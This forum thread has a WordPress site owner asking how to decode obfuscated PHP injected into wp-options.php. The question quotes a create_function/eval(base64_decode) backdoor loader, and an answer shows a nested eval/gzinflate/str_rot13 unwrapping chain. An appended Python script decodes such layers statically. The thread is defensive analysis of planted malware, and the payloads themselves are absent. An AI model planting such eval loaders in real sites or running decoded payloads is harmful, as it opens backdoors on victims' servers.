【Question title】: Can anyone tell me how to decode this PHP file [duplicate]
【Posted】: 2020-10-04 09:45:28
【Question description】:

I think someone injected this code into my wp-options.php file:

  <?php
  $func="cr"."ea"."te_"."fun"."ction";
  $x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");
  $x("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");
  exit;
  ?>

After many attempts at decoding it, I only got this result:

<?php

 $x=create_function("\$c","eval(base64_decode(\$c));");
 $x("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");exit;
?>

【Question comments】:

  • eval → echo, rinse and repeat.

Tags: php base64 eval decode


【Solution 1】:

This appears to be an exploit: https://pastebin.com/rp5firhv

eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));

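【Comments】:

  • @lllya how did you get this code, where does this variable $An0n_3xPloiTeR come from, and is it possible to see the contents of this variable??
  • @ChihebLoussif First decode the string inside $x(string), change eval to echo, and it will print the decoded code
  • @lllya thanks, that works. So what about the variable $An0n_3xPloiTeR? I think this variable contains the code that we can decrypt; where can I find it??
  • Try echoing $An0n_3xPloiTer: echo str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR)))))))))));die;
  • @lllya it gives me this error: Notice: Undefined variable: An0n_3xPloiTeR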
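
The eval-to-echo decoding discussed in this thread can also be done without running any PHP. The following is an added example, not code from the original thread: it reads the wrapper expression quoted in the answer, maps each PHP function to a Python equivalent, and applies the chain to the payload purely as data. The names `call_chain`, `unwrap` and `make_sample` are chosen here, and the payload is a constructed harmless string, since the real one is not on the page.

```python
import base64, codecs, re, zlib

# PHP function -> equivalent Python transform on bytes.
DECODERS = {
    "base64_decode": base64.b64decode,
    "strrev": lambda b: b[::-1],
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE stream
    "gzuncompress": zlib.decompress,                 # zlib-wrapped stream
}

def call_chain(expr):
    """List the PHP functions nested in expr, innermost (applied first) first."""
    names = [n for n in re.findall(r"(\w+)\s*\(", expr) if n != "eval"]
    unknown = sorted(set(names) - set(DECODERS))
    if unknown:
        # Refuse anything that is not a pure decoding step.
        raise ValueError(f"no static decoder for: {unknown}")
    return names[::-1]

def unwrap(expr, blob):
    """Apply the chain to blob as data only; nothing is evaluated as PHP."""
    for name in call_chain(expr):
        blob = DECODERS[name](blob)
    return blob

def make_sample(text):
    """Constructed test input: encode harmless text the way STAGE2 expects."""
    data = DECODERS["str_rot13"](text)
    for _ in range(4):
        raw = zlib.compressobj(wbits=-15)
        data = zlib.compress(raw.compress(data) + raw.flush())
    return base64.b64encode(data)[::-1]

# Wrapper expression quoted in the answer above.
STAGE2 = ('eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress('
          'gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev('
          '$An0n_3xPloiTeR))))))))))));')

if __name__ == "__main__":
    blob = make_sample(b'<?php echo "constructed sample"; ?>')
    print(call_chain(STAGE2))
    print(unwrap(STAGE2, blob).decode())
```

The same `unwrap` handles the outer layer from the question: pass it `eval(base64_decode($c));` and the string given to `$x(...)`.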